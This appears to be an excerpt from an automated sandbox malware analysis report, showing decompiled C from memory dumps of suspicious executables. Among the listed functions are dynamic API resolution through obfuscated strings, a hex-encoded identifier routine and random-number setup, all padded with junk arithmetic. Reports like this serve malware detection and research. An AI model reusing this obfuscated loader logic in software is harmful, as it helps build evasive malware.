Part of subcall function 0039FFF2: __getptd_noexit.LIBCMT ref: 0039FFF5
Part of subcall function 0039FFF2: __amsg_exit.LIBCMT ref: 003A0002

__getptd.LIBCMT ref: 003BD8B3

Strings

csm, xrefs: 003BD8C1

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 252611244509b828e1755f307ad22f58b761780261b26ac8efec120208b6a113
Instruction ID: 243561a92c3a6838ad0634c27f14cf12b652f03d4acf15716aad11950f2ddc05
Opcode Fuzzy Hash: 252611244509b828e1755f307ad22f58b761780261b26ac8efec120208b6a113
Instruction Fuzzy Hash: 66014B34800208CECF369F26E8406ECB7B6BF1131DF65482EE582DAA91EB309D91DF41

Uniqueness

Uniqueness Score: -1.00%

Function 003AB8D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E003AB8D5(signed int* _a4) {
				intOrPtr* _t8;
				intOrPtr _t9;
				signed int* _t13;

				_t8 =  *0x3d12d0; // 0x0
				_t9 =  *_t8;
				if(_t9 == 0) {
					E003AB0E6(_a4, 1);
					goto L5;
				} else {
					if(_t9 == 0x41) {
						 *0x3d12d0 =  *0x3d12d0 + 1;
						E003AB4D8(_a4, "{flat}");
						L5:
						return _a4;
					} else {
						_t13 = _a4;
						_t13[1] = _t13[1] & 0xffff00ff;
						 *_t13 =  *_t13 & 0x00000000;
						_t13[1] = 2;
						return _t13;
					}
				}
			}

0x003ab8da
0x003ab8df
0x003ab8e3
0x003ab916
0x00000000
0x003ab8e5
0x003ab8e7
0x003ab8ff
0x003ab90a
0x003ab91b
0x003ab91f
0x003ab8e9
0x003ab8e9
0x003ab8ec
0x003ab8f3
0x003ab8f6
0x003ab8fb
0x003ab8fb
0x003ab8e7

APIs

DName::DName.LIBCMT ref: 003AB90A
DName::DName.LIBCMT ref: 003AB916

Strings

{flat}, xrefs: 003AB905

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: 24849fe3fb6c4c08ffd55da99c4cf1ee475cd66a1e1c6289dbeb93cf15cf9b8a
Instruction ID: b0d3662bc91de63fcec46e457756f96212d7c38f01f6bd4956477363af06cc41
Opcode Fuzzy Hash: 24849fe3fb6c4c08ffd55da99c4cf1ee475cd66a1e1c6289dbeb93cf15cf9b8a
Instruction Fuzzy Hash: C3F0E531144348AFC712CF59E445BB57BA8EB42751F098045F54C0F263C731D941DB90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: aw1j2ylb8pebwqkliimle.exePID: 7936, Parent PID: 3360COMMON

Execution Graph

Execution Coverage:	16.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	2000
Total number of Limit Nodes:	13

Executed Functions

Function 00F723B0 Relevance: 19.9, APIs: 13, Instructions: 431
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00F723B0(signed int __fp0, intOrPtr _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				struct HINSTANCE__* _v20;
				long _v24;
				long long _v28;
				signed char _v32;
				long long _v36;
				signed char _v40;
				signed int _v44;
				long long _v52;
				long long _v60;
				char _v80;
				char _v100;
				long _t91;
				signed char _t96;
				intOrPtr* _t97;
				void* _t99;
				struct HINSTANCE__* _t101;
				void* _t108;
				void* _t109;
				intOrPtr* _t116;
				void* _t118;
				signed char _t119;
				signed char _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr* _t124;
				short _t127;
				short _t128;
				unsigned int _t129;
				signed char _t130;
				void* _t136;
				intOrPtr _t143;
				void* _t147;
				char _t161;
				signed int _t162;
				signed int _t166;
				intOrPtr* _t171;
				intOrPtr* _t172;
				short _t173;
				intOrPtr _t175;
				intOrPtr* _t177;
				intOrPtr* _t179;
				intOrPtr _t182;
				void* _t189;
				intOrPtr _t193;
				void* _t194;
				void* _t195;
				signed long long _t198;
				void* _t199;
				void* _t201;
				void* _t207;
				void* _t208;
				long long _t211;
				struct HINSTANCE__* _t215;
				void* _t216;
				intOrPtr* _t223;
				void* _t228;
				void* _t231;
				signed int _t232;
				void* _t233;
				void* _t239;
				signed int _t259;
				signed int _t262;
				long long _t271;
				long long _t273;
				intOrPtr _t285;

				_t91 =  *0xfae4c4; // 0xe7e2
				_v24 = _t91;
				asm("fild dword [ebp-0x14]");
				_v44 = __fp0;
				_t259 =  *0xfae568 + _v44;
				 *0xfae4c4 = E00F7CABC();
				 *0xfae2c4 = ( *0xfae2c4 & 0x0000ffff) - ( *0xfae558 & 0x0000ffff) + 0x579a5650;
				 *0xfae318 =  *0xfae318 - 1;
				_v24 = 0;
				_t251 = ( *0xfae318 & 0x0000ffff) + ( *0xfae4a8 & 0x0000ffff) - 0xfd9c7e54;
				if(( *0xfae318 & 0x0000ffff) + ( *0xfae4a8 & 0x0000ffff) != 0xfd9c7e54) {
					_t259 =  *0xfae3b4 +  *0xfa7850;
					 *0xfae3b4 = _t259;
				}
				_t223 = E00F6CF90(_t251, _t259, 0x3038, 0xe);
				_t96 =  *0xfae1d0; // 0x2f751c98
				_v20 = 0x1f4bf161 - _t96;
				asm("fild dword [ebp-0x10]");
				_v44 = _t259;
				 *0xfae1d0 =  *0xfae1d0 + 1;
				_t262 = _v44;
				asm("fucompp");
				asm("fnstsw ax");
				if((_t96 & 0x00000044) == 0) {
					 *0xfae524 = ( *0xfae524 & 0x0000ffff) + 0x101fdd13;
				}
				_t97 = _t223;
				_t189 = _a4 - _t223;
				do {
					_t161 =  *_t97;
					 *((char*)(_t189 + _t97)) = _t161;
					_t97 = _t97 + 1;
				} while (_t161 != 0);
				E00F76570(0xe, _t223);
				_t99 = GetProcessHeap();
				_t162 =  *0xfae264; // 0x353dd48b
				_v16 = _t99;
				 *0xfae264 = _t162 * 0x73196110;
				if(_t99 != 0) {
					_t101 = LoadLibraryA(E00F6CF90(__eflags, _t262, 0x1f, 0xd)); // executed
					_t215 = _t101;
					_v20 = _t215;
					E00F76570(0xd, _t100);
					__eflags = _t215;
					if(__eflags != 0) {
						_t147 = GetProcAddress(_t215, E00F6CF90(__eflags, _t262, 0x39ff, 0x10));
						E00F76570(0x10, _t103);
						__eflags = _t147;
						if(_t147 != 0) {
							_v12 = 0x288;
							_t216 = HeapAlloc(_v16, 0, 0x288);
							_v8 = _t216;
							__eflags = _t216;
							if(_t216 != 0) {
								_t108 =  *_t147(_t216,  &_v12); // executed
								_v44 =  *0xfae20c +  *0xfa7848;
								_t266 =  *0xfae2a8 * _v44;
								 *0xfae2a8 =  *0xfae2a8 * _v44;
								__eflags = _t108 - 0x6f;
								if(_t108 != 0x6f) {
									L18:
									_t109 =  *_t147(_t216,  &_v12); // executed
									__eflags = _t109;
									if(__eflags != 0) {
										L56:
										__eflags = _t216;
										if(_t216 != 0) {
											HeapFree(_v16, 0, _t216);
										}
									} else {
										_t166 =  *0xfae610; // 0x80000000
										 *0xfae610 = _t166 * (( *0xfae020 & 0x0000ffff) + 0xae9efa3c);
										_t116 = E00F6CF90(__eflags, _t266, 0x3703, 8);
										 *0xfae390 =  *0xfae390 - 1;
										_t193 =  *0xfae390; // 0xcd6d4fe9
										 *0xfae5d4 = ( *0xfae5d4 & 0x0000ffff) - _t193 - 0x1401b11;
										_t171 = _t116;
										_t228 =  &_v80 - _t116;
										__eflags = _t228;
										do {
											_t194 =  *_t171;
											 *((char*)(_t228 + _t171)) = _t194;
											_t171 = _t171 + 1;
											__eflags = _t194;
										} while (_t194 != 0);
										_v44 =  *0xfae314;
										_t271 =  *0xfae2d0 + _v44 +  *0xfa7840;
										asm("fsubp st1, st0");
										 *0xfae548 = _t271;
										E00F76570(8, _t116);
										__eflags = _v8;
										if(_v8 != 0) {
											do {
												_t172 =  &_v80;
												_t37 = _t216 + 0x1d8; // 0x1d8
												_t118 = _t37;
												while(1) {
													_t195 =  *_t118;
													__eflags = _t195 -  *_t172;
													if(_t195 !=  *_t172) {
														break;
													}
													__eflags = _t195;
													if(_t195 == 0) {
														L28:
														_t118 = 0;
													} else {
														_t208 =  *((intOrPtr*)(_t118 + 1));
														__eflags = _t208 -  *((intOrPtr*)(_t172 + 1));
														if(_t208 !=  *((intOrPtr*)(_t172 + 1))) {
															break;
														} else {
															_t118 = _t118 + 2;
															_t172 = _t172 + 2;
															__eflags = _t208;
															if(_t208 != 0) {
																continue;
															} else {
																goto L28;
															}
														}
													}
													L30:
													__eflags = _t118;
													if(_t118 == 0) {
														L41:
														_t173 =  *0xfae108; // 0x5dc4
														_t216 =  *_t216;
														_v32 = _t173 + 0x792b8a3e;
														asm("fild dword [ebp-0x1c]");
														_v60 = _t271;
														_t119 =  *0xfae0bc; // 0xdec
														_t273 =  *0xfae070 -  *0xfa783c;
														 *0xfae0bc =  *0xfae0bc - 1;
														 *0xfae108 =  *0xfae108 + 1;
														_v52 = _t273;
														_v32 = _t119;
														asm("fild dword [ebp-0x1c]");
														_t271 = _t273 + _v52;
														asm("fcomp qword [ebp-0x38]");
														asm("fnstsw ax");
														__eflags = _t119 & 0x00000005;
														if((_t119 & 0x00000005) == 0) {
															 *0xfae380 =  *0xfae380 -  *0xfa75c8;
															_t198 =  *0xfae380; // 0x8e600000
															_t120 =  *0xfae384; // 0xc1f89f38
															_t271 =  *0xfae50c;
															_t175 =  *0xfae0f0; // 0xfafdf6a6
															_v40 = _t120;
															_v44 = _t198;
															asm("fsubr qword [ebp-0x28]");
															_v32 = _t175 - 0x725c3b33;
															_v60 = _t271;
															asm("fild dword [ebp-0x1c]");
															asm("fcomp qword [ebp-0x38]");
															asm("fnstsw ax");
															__eflags = _t120 & 0x00000041;
															if((_t120 & 0x00000041) != 0) {
																 *0xfae590 = 0x4d08d8b2;
															}
														}
														goto L44;
													} else {
														_t177 =  &_v80;
														_t41 = _t216 + 0x1b0; // 0x1b0
														_t121 = _t41;
														while(1) {
															_t199 =  *_t121;
															__eflags = _t199 -  *_t177;
															if(_t199 !=  *_t177) {
																break;
															}
															__eflags = _t199;
															if(_t199 == 0) {
																L36:
																_t121 = 0;
															} else {
																_t207 =  *((intOrPtr*)(_t121 + 1));
																__eflags = _t207 -  *((intOrPtr*)(_t177 + 1));
																if(_t207 !=  *((intOrPtr*)(_t177 + 1))) {
																	break;
																} else {
																	_t121 = _t121 + 2;
																	_t177 = _t177 + 2;
																	__eflags = _t207;
																	if(_t207 != 0) {
																		continue;
																	} else {
																		goto L36;
																	}
																}
															}
															L38:
															__eflags = _t121;
															if(_t121 == 0) {
																goto L41;
															} else {
																 *0xfae060 =  *0xfae060 - 1;
																_t122 =  *0xfae060; // 0x675b
																 *0xfae5dc = ( *0xfae5dc & 0x0000ffff) + _t122 - 0x70116dad;
																__eflags =  *(_t216 + 0x190) - 8;
																if(__eflags <= 0) {
																	_t124 = E00F6CF90(__eflags, _t271, 0xe14, 0x11);
																	_t179 = _t124;
																	_t231 =  &_v100 - _t124;
																	__eflags = _t231;
																	do {
																		_t201 =  *_t179;
																		 *((char*)(_t231 + _t179)) = _t201;
																		_t179 = _t179 + 1;
																		__eflags = _t201;
																	} while (_t201 != 0);
																	E00F76570(0x11, _t124);
																	_t232 = 0;
																	 *0xfae170 =  *0xfae170 +  *0xfa7838;
																	__eflags =  *(_t216 + 0x190);
																	if( *(_t216 + 0x190) != 0) {
																		asm("fld1");
																		do {
																			 *0xfae284 = 0xffffdd06;
																			_v60 =  *0xfae1a8 + st1;
																			_t127 =  *0xfae5a8; // 0x0
																			_v32 = _t127;
																			_v60 =  *0xfae5e4 + _v60;
																			asm("fild dword [ebp-0x1c]");
																			_t128 = E00F7CABC();
																			_t182 = _a4;
																			 *0xfae5a8 = _t128;
																			_t129 =  *(_t216 + _t232 + 0x194) & 0x000000ff;
																			_t130 = _t129 & 0x8000000f;
																			__eflags = _t130;
																			 *0xfae1a8 =  *0xfae1a8 + st2;
																			 *((char*)(_t182 + _t232 * 2)) =  *(_t239 + (_t129 >> 4) - 0x60) & 0x000000ff;
																			if(_t130 < 0) {
																				_t130 = (_t130 - 0x00000001 | 0xfffffff0) + 1;
																				__eflags = _t130;
																			}
																			 *((char*)(_t182 + 1 + _t232 * 2)) =  *(_t239 + (_t130 & 0x000000ff) - 0x60) & 0x000000ff;
																			_t232 = _t232 + 1;
																			_v60 =  *0xfae130;
																			_t285 =  *0xfae0ac;
																			asm("fsubr qword [ebp-0x38]");
																			 *0xfae130 = _t285;
																			__eflags = _t232 -  *(_t216 + 0x190);
																		} while (_t232 !=  *(_t216 + 0x190));
																		st1 = _t285;
																		st0 = _t285;
																	}
																	 *((char*)(_a4 +  *(_t216 + 0x190) * 2)) = 0;
																	_v24 = 1;
																} else {
																	 *0xfae55c = 0xffff80e0;
																	goto L44;
																}
															}
															goto L55;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L38;
													}
													L55:
													_t216 = _v8;
													goto L56;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L30;
												L44:
												__eflags = _t216;
											} while (_t216 != 0);
											goto L55;
										}
									}
									FreeLibrary(_v20);
									return _v24;
								} else {
									_t233 = _v16;
									HeapFree(_t233, 0, _t216);
									_t136 = HeapAlloc(_t233, 0, _v12);
									_v8 = _t136;
									__eflags = _t136;
									if(_t136 != 0) {
										_t216 = _t136;
										goto L18;
									} else {
										 *0xfae4b8 = 0xffffeb7f;
										FreeLibrary(_v20);
										__eflags = 0;
										return 0;
									}
								}
							} else {
								FreeLibrary(_v20);
								__eflags = 0;
								return 0;
							}
						} else {
							FreeLibrary(_t215);
							 *0xfae088 =  *0xfae088 -  *0xfa75c8;
							_t211 =  *0xfae088; // 0xcfbc0000
							_t143 =  *0xfae08c; // 0xc2156e26
							_v28 =  *0xfae5b0;
							_v32 = _t143;
							_v36 = _t211;
							__eflags = 0;
							_v44 =  *0xfae470 + _v36;
							asm("fsubr qword [ebp-0x28]");
							asm("fsubr qword [ebp-0x18]");
							 *0xfae5b0 =  *0xfae5ac;
							return 0;
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t99;
				}
			}

0x00f723b6
0x00f723bf
0x00f723c2
0x00f723c5
0x00f723ce
0x00f723d6
0x00f723f5
0x00f7240a
0x00f72419
0x00f72420
0x00f72426
0x00f7242e
0x00f72434
0x00f72434
0x00f72447
0x00f72449
0x00f72455
0x00f72458
0x00f7245e
0x00f72467
0x00f72473
0x00f72476
0x00f72478
0x00f7247d
0x00f7248c
0x00f7248c
0x00f72496
0x00f72498
0x00f724a0
0x00f724a0
0x00f724a2
0x00f724a5
0x00f724a6
0x00f724ad
0x00f724b5
0x00f724bb
0x00f724c7
0x00f724ca
0x00f724d2
0x00f724e9
0x00f724ef
0x00f724f4
0x00f724f7
0x00f724ff
0x00f72501
0x00f72528
0x00f7252a
0x00f72532
0x00f72534
0x00f7259b
0x00f725a8
0x00f725aa
0x00f725ad
0x00f725af
0x00f725c9
0x00f725d7
0x00f725e0
0x00f725e3
0x00f725e9
0x00f725ec
0x00f72630
0x00f72635
0x00f72637
0x00f72639
0x00f7295f
0x00f7295f
0x00f72961
0x00f7296a
0x00f7296a
0x00f7263f
0x00f72646
0x00f7265d
0x00f72668
0x00f7266d
0x00f7267d
0x00f72691
0x00f72698
0x00f7269a
0x00f7269a
0x00f726a0
0x00f726a0
0x00f726a2
0x00f726a5
0x00f726a6
0x00f726a6
0x00f726b1
0x00f726c4
0x00f726ca
0x00f726cc
0x00f726d2
0x00f726da
0x00f726de
0x00f726f0
0x00f726f0
0x00f726f3
0x00f726f3
0x00f72700
0x00f72700
0x00f72702
0x00f72704
0x00000000
0x00000000
0x00f72706
0x00f72708
0x00f7271c
0x00f7271c
0x00f7270a
0x00f7270a
0x00f7270d
0x00f72710
0x00000000
0x00f72712
0x00f72712
0x00f72715
0x00f72718
0x00f7271a
0x00000000
0x00000000
0x00000000
0x00000000
0x00f7271a
0x00f72710
0x00f72725
0x00f72725
0x00f72727
0x00f7279a
0x00f7279a
0x00f727a4
0x00f727ac
0x00f727af
0x00f727b2
0x00f727bb
0x00f727c1
0x00f727c7
0x00f727ce
0x00f727d8
0x00f727db
0x00f727de
0x00f727e1
0x00f727e4
0x00f727e7
0x00f727e9
0x00f727ec
0x00f727fa
0x00f72800
0x00f72806
0x00f7280b
0x00f72811
0x00f72817
0x00f7281a
0x00f7281d
0x00f72826
0x00f72829
0x00f7282c
0x00f7282f
0x00f72832
0x00f72834
0x00f72837
0x00f72839
0x00f72839
0x00f72837
0x00000000
0x00f72729
0x00f72729
0x00f7272c
0x00f7272c
0x00f72732
0x00f72732
0x00f72734
0x00f72736
0x00000000
0x00000000
0x00f72738
0x00f7273a
0x00f7274e
0x00f7274e
0x00f7273c
0x00f7273c
0x00f7273f
0x00f72742
0x00000000
0x00f72744
0x00f72744
0x00f72747
0x00f7274a
0x00f7274c
0x00000000
0x00000000
0x00000000
0x00000000
0x00f7274c
0x00f72742
0x00f72757
0x00f72757
0x00f72759
0x00000000
0x00f7275b
0x00f7275b
0x00f72762
0x00f72777
0x00f7277e
0x00f72784
0x00f72853
0x00f7285e
0x00f72860
0x00f72860
0x00f72862
0x00f72862
0x00f72864
0x00f72867
0x00f72868
0x00f72868
0x00f7286f
0x00f72880
0x00f72885
0x00f7288b
0x00f72891
0x00f72897
0x00f7289f
0x00f728a4
0x00f728ba
0x00f728c3
0x00f728cf
0x00f728d2
0x00f728d5
0x00f728db
0x00f728e0
0x00f728e3
0x00f728ef
0x00f728f9
0x00f728f9
0x00f728fe
0x00f72909
0x00f7290c
0x00f72912
0x00f72912
0x00f72912
0x00f7291b
0x00f7291f
0x00f72926
0x00f72929
0x00f7292f
0x00f72932
0x00f72938
0x00f72938
0x00f72944
0x00f72946
0x00f72946
0x00f72951
0x00f72955
0x00f7278a
0x00f7278f
0x00000000
0x00f7278f
0x00f72784
0x00000000
0x00f72759
0x00f72752
0x00f72754
0x00000000
0x00f72754
0x00f7295c
0x00f7295c
0x00000000
0x00f7295c
0x00f72720
0x00f72722
0x00000000
0x00f7283f
0x00f7283f
0x00f7283f
0x00000000
0x00f72847
0x00f726de
0x00f72974
0x00f72983
0x00f725ee
0x00f725ee
0x00f725f5
0x00f72602
0x00f72608
0x00f7260b
0x00f7260d
0x00f7262e
0x00000000
0x00f7260f
0x00f72618
0x00f7261f
0x00f72627
0x00f7262d
0x00f7262d
0x00f7260d
0x00f725b1
0x00f725b5
0x00f725bd
0x00f725c3
0x00f725c3
0x00f72536
0x00f72537
0x00f7254c
0x00f72558
0x00f7255e
0x00f72563
0x00f7256c
0x00f7256f
0x00f72575
0x00f72577
0x00f72580
0x00f72583
0x00f72586
0x00f7258f
0x00f7258f
0x00f72503
0x00f72504
0x00f7250a
0x00f7250a
0x00f724d4
0x00f724d8
0x00f724d8

APIs

GetProcessHeap.KERNEL32(?,?,?,?), ref: 00F724B5

Part of subcall function 00F6CF90: _malloc.LIBCMT ref: 00F6CFC7

LoadLibraryA.KERNELBASE(00000000,?,?,?,?,?,?), ref: 00F724E9

Part of subcall function 00F76570: _memset.LIBCMT ref: 00F76593
Part of subcall function 00F76570: _free.LIBCMT ref: 00F76599

GetProcAddress.KERNEL32(00000000,00000000), ref: 00F7251F
FreeLibrary.KERNEL32(00000000,?,?,?,74CB4EE0,?,?,?,?,?,?,?,?), ref: 00F72537

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: Library$AddressFreeHeapLoadProcProcess_free_malloc_memset
String ID:
API String ID: 3762248333-0
Opcode ID: a00d12a726d3dd3244f07dd2d838df195dd164b2c02840344780c0a9b2bbdd60
Instruction ID: fb43afd63b4287ab38e4fda49953882ca15f3414c3527b78883ebe2d1520e346
Opcode Fuzzy Hash: a00d12a726d3dd3244f07dd2d838df195dd164b2c02840344780c0a9b2bbdd60
Instruction Fuzzy Hash: 50F114B4D0021DDFDB049F64EC946BE7FB4FF5A320F04815AE884A32A4E7314465EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F74F40 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 178
libraryloaderencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00F74F40(void* __ebx, void* __edi, long long __fp0) {
				short _v6;
				char _v8;
				intOrPtr _v12;
				long long _v16;
				long long _v24;
				signed int _v32;
				signed int _t20;
				intOrPtr _t23;
				signed char _t27;
				void* _t29;
				void* _t31;
				short _t34;
				short _t36;
				CHAR* _t39;
				CHAR* _t41;
				struct HINSTANCE__* _t43;
				intOrPtr* _t46;
				void* _t47;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				struct HINSTANCE__* _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				long* _t62;
				short _t63;
				intOrPtr _t64;
				CHAR* _t74;
				void* _t75;
				void* _t76;
				void* _t79;
				long long _t102;

				_t20 =  *0xfae2fc; // 0x87a9e522
				 *0xfae2fc = _t20 * 0x702c0532;
				 *0xfae288 =  *0xfae288 + 1;
				_t51 =  *0xfae288; // 0xec5403bf
				_v12 = _t51 + 0x2d5138c2;
				asm("fild dword [ebp-0x8]");
				_v16 = __fp0;
				_t59 =  *0xfb0758; // 0x494
				_t94 =  *0xfae278 + _v16;
				 *0xfae278 = _t94;
				E00F6F090(_t94, _t59);
				_t23 =  *0xfb096c; // 0xffffffff
				_t76 = _t75 + 4;
				_t81 = _t23;
				if(_t23 != 0) {
					__eflags = _t23 - 1;
					if(__eflags != 0) {
						L11:
						if( *0xfb096c != 0xffffffff) {
							L18:
							_t60 =  *0xfb0758; // 0x494
							E00F6D240(_t94, _t60);
							return _v8;
						}
						L12:
						 *0xfae298 =  *0xfae298 - 1;
						_t61 =  *0xfae298; // 0xfb56
						_t27 = _t61 + 0x7f07972;
						if(_t27 <= 0xe0591c12) {
							_t53 =  *0xfae37c; // 0x277c3927
							_v12 = _t53;
							asm("fild dword [ebp-0x8]");
							_v32 = _t94;
							_t94 =  *0xfae3c8 -  *0xfa79c0;
							asm("fsubr qword [ebp-0x1c]");
							 *0xfae37c = E00F7CABC();
						} else {
							asm("fucompp");
							asm("fnstsw ax");
							asm("fld1");
							_t94 =  *0xfae600 + st0;
							asm("fxch st0, st1");
							 *0xfae600 = _t94;
							_t90 = _t27 & 0x00000044;
							if((_t27 & 0x00000044) != 0) {
								st0 = _t94;
							} else {
								asm("fsubr qword [0xfae2e0]");
								 *0xfae2e0 = _t94;
								asm("fsubr qword [0xfa79d0]");
								_v32 =  *0xfae2e0 -  *0xfa79c8;
								_t94 =  *0xfae02c * _v32;
								 *0xfae02c =  *0xfae02c * _v32;
							}
						}
						_t29 = E00F7CCDD(_t90);
						_v8 = _t29 + E00F7CCDD(_t90);
						_t31 = E00F7CCDD(_t90);
						_v6 = _t31 + E00F7CCDD(_t90);
						goto L18;
					}
					L9:
					_t62 =  *0xfb0960; // 0x0
					if(CryptGenRandom(_t62, 4,  &_v8) == 0) {
						_t34 =  *0xfae230; // 0xeabf
						_t55 =  *0xfae11c; // 0xe8ccf6b5
						 *0xfb096c = 0xffffffff;
						 *0xfae230 = _t55 + _t34;
					}
					goto L11;
				}
				_t36 =  *0xfae36c; // 0x0
				_v12 = _t36;
				asm("fild dword [ebp-0x8]");
				_v32 = _t94;
				_t102 =  *0xfae60c;
				_t63 =  *0xfae5d8; // 0x39ee
				_v24 = _t102;
				_v12 = _t63;
				asm("fild dword [ebp-0x8]");
				_t94 = _t102 + _v24;
				asm("fsubr qword [ebp-0x1c]");
				 *0xfae36c = E00F7CABC();
				 *0xfae5d8 =  *0xfae5d8 - 1;
				_t39 = E00F6CF90(_t81, _t94, 0xea2, 0x15);
				_t58 =  *0xfb0310; // 0x76a00000
				_t66 = _t39;
				 *0xfb0968 = GetProcAddress(_t58, _t39);
				_t41 = E00F6CF90(_t81, _t94, 0x3003, 0xf);
				_t64 =  *0xfae4d0; // 0x6c745516
				_t79 = _t76 + 0x10;
				_t74 = _t41;
				if(_t64 == 0x8c461eb7) {
					asm("fld1");
					asm("faddp st1, st0");
					_v32 =  *0xfae584;
					_t94 =  *0xfae184 +  *0xfa79e0;
					asm("fsubr qword [ebp-0x1c]");
					 *0xfae584 = _t94;
				}
				E00F76570(0x15, _t66);
				_t43 =  *0xfb0310; // 0x76a00000
				 *0xfb0964 = GetProcAddress(_t43, _t74);
				E00F76570(0xf, _t74);
				_t46 =  *0xfb0968;
				_t76 = _t79 + 0x10;
				if(_t46 == 0 ||  *0xfb0964 == 0) {
					L7:
					 *0xfae2a8 = 0x4ec9a48d;
					 *0xfb096c = 0xffffffff;
					goto L12;
				} else {
					_t47 =  *_t46(0xfb0960, 0, 0, 1, 0); // executed
					if(_t47 == 0) {
						goto L7;
					}
					 *0xfb096c = 1;
					goto L9;
				}
			}

0x00f74f46
0x00f74f51
0x00f74f56
0x00f74f5c
0x00f74f68
0x00f74f6c
0x00f74f6f
0x00f74f78
0x00f74f7e
0x00f74f82
0x00f74f88
0x00f74f8d
0x00f74f92
0x00f74f95
0x00f74f97
0x00f750c2
0x00f750c5
0x00f750fe
0x00f75105
0x00f751d1
0x00f751d1
0x00f751d8
0x00f751e7
0x00f751e7
0x00f7510b
0x00f7510b
0x00f75112
0x00f7511c
0x00f75126
0x00f75181
0x00f75187
0x00f7518a
0x00f7518d
0x00f75196
0x00f7519c
0x00f751a4
0x00f75128
0x00f75134
0x00f75136
0x00f7513e
0x00f75140
0x00f75142
0x00f75144
0x00f7514a
0x00f7514d
0x00f751ab
0x00f7514f
0x00f7514f
0x00f75155
0x00f75161
0x00f7516d
0x00f75176
0x00f75179
0x00f75179
0x00f7514d
0x00f751ad
0x00f751bb
0x00f751bf
0x00f751cd
0x00000000
0x00f751cd
0x00f750c7
0x00f750c7
0x00f750dc
0x00f750de
0x00f750e4
0x00f750ed
0x00f750f7
0x00f750f7
0x00000000
0x00f750dc
0x00f74f9d
0x00f74fa6
0x00f74fab
0x00f74fae
0x00f74fb1
0x00f74fb7
0x00f74fc1
0x00f74fc4
0x00f74fc7
0x00f74fca
0x00f74fcd
0x00f74fd7
0x00f74fdd
0x00f74fe9
0x00f74fee
0x00f74ffd
0x00f7500a
0x00f7500f
0x00f75014
0x00f7501a
0x00f7501d
0x00f75025
0x00f7502d
0x00f7502f
0x00f7503d
0x00f75046
0x00f7504c
0x00f7504f
0x00f7504f
0x00f75058
0x00f7505d
0x00f7506c
0x00f75071
0x00f75076
0x00f7507b
0x00f75082
0x00f750ac
0x00f750ac
0x00f750b6
0x00000000
0x00f7508d
0x00f7509a
0x00f7509e
0x00000000
0x00000000
0x00f750a0
0x00000000
0x00f750a0

APIs

Part of subcall function 00F6F090: WaitForSingleObject.KERNEL32(?,00004E20,00000000,00000000,?,181DD011,?,00000000), ref: 00F6F0DD

GetProcAddress.KERNEL32(76A00000,00000000), ref: 00F75001
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00F75067
CryptGenRandom.ADVAPI32(00000000,00000004,74CB4EE0,02731230,?,00F669DC,02731230,00F6B64D,?,00000009,74CB4EE0,?,00F758B6,?,00000000,00000009), ref: 00F750D4
_rand.LIBCMT ref: 00F751AD
_rand.LIBCMT ref: 00F751B4
_rand.LIBCMT ref: 00F751BF
_rand.LIBCMT ref: 00F751C6

Part of subcall function 00F6CF90: _malloc.LIBCMT ref: 00F6CFC7

Strings

'9|', xrefs: 00F75181, 00F751A4

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
